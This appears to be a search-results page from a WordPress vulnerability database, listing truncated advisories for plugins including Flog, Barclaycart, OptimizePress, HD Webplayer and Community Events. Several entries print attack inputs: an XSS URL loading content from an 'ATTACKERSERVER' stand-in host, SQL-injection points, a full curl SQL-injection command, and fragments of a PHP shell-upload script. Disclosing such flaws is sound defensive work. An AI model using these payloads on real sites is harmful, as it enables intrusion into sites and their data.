4359 matches found
Flog <= 0.1 - Unauthenticated Reflected Cross-Site Scripting (XSS)
The last time it was checked the plugin was still affected and had been closed. https://www.example.com/wp-content/plugins/flog/silex-plugin-themes/flash-theme/silexserver/cgi/scripts/proxy.php?url=ATTACKERSERVER/test.html With the payload in the test.html file controlled by the attackers...
Barclaycart - Unauthenticated Shell Upload
The Barclaycart WordPress plugin was found to be vulnerable to an Unauthenticated Shell Upload security vulnerability, due to using a vulnerable version of the third-party uploadify dependency. This issue has been seen exploited in the wild. "@$uploadfile",...
OptimizePress Theme < 1.6 - Unauthenticated Arbitrary File Upload
The OptimizePress premium WordPress theme was vulnerable to Unauthenticated Arbitrary File Upload, which could allow unauthenticated attackers to compromise a WordPress site. This vulnerability has been seen exploited in the wild. The affected file was:...
Plugin HD Webplayer <= 1.1 - SQL Injections
The last time it was checked the plugin was still affected and had been closed. http://example.com/wp-content/plugins/hd-webplayer/config.php?id=INJECT HERE http://example.com/wp-content/plugins/hd-webplayer/playlist.php?videoid=INJECT HERE...
MM Forms & MM Forms Community 2.2.6 - Unauthenticated Arbitrary File Upload
Attackers have been seen probing for the "/wp-content/plugins/mm-forms/includes/doajaxfileupload.php" file. PostShell.php "@$uploadfile"; curlsetopt$ch, CURLOPTRETURNTRANSFER, 1; $postResult = curlexec$ch; curlclose$ch; print "$postResult"; ? Shell Access :...
Omni Secure Files 0.1.13 - Unauthenticated Arbitrary File Upload
This plugin came with the vulnerable plupload library and has been seen exploited in the wild. The vulnerable file is: http://www.example.com/wp-content/plugins/omni-secure-files/plupload/examples/upload.php...
Gallery 3.06 - Unauthenticated File Upload PHP Code Execution
The Gallery by BestWebSoft WordPress plugin was affected by an Unauthenticated File Upload PHP Code Execution security vulnerability. The vulnerable file was: http://www.example.com/wp-content/plugins/gallery-plugin/upload/php.php...
Community Events <= 1.2.1 - SQL Injection
The Community Events WordPress plugin was affected by a SQL Injection security vulnerability. curl --data "id=-1 AND EXTRACTVALUE1, CONCATCHAR58,@@version,CHAR58-- " http://www.site.com/wp-content/plugins/community-events/tracker.php...
myGallery <= 1.4b4 - Unauthenticated File Inclusion
The MySliderGallery WordPress plugin was affected by an Unauthenticated File Inclusion security vulnerability. This vulnerability has been seen exploited in the wild with the following payload:...